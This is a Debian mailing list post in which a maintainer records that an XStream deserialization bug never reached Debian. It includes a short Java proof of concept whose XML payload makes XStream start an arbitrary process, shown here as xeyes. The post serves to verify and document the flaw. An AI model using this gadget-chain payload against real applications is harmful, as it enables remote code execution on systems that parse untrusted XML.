Bug#734821: 734821
Sébastien Delafond
seb at debian.org
Fri Oct 10 09:19:58 UTC 2014
notfixed 734821 1.4.7-1
thanks
This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.
If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:
import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
/* Thanks to </pwntester> for the PoC
* http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */
public class XStreamExploit {
public static void main(String[] args) throws IOException {
String process = "/usr/bin/xeyes";
String payload = "<sorted-set>" +
"<string>foo</string>" +
"<dynamic-proxy>" +
"<interface>java.lang.Comparable</interface>" +
"<handler class=\"java.beans.EventHandler\">" +
" <target class=\"java.lang.ProcessBuilder\">" +
" <command>" +
" <string>" + process + "</string>" +
" </command>" +
" </target>" +
" <action>start</action>" +
"</handler>" +
"</dynamic-proxy>" +
"</sorted-set>";
XStream xstream = new XStream(new DomDriver());
xstream.fromXML(payload);
}
}
Cheers,
--Seb
More information about the pkg-java-maintainers
mailing list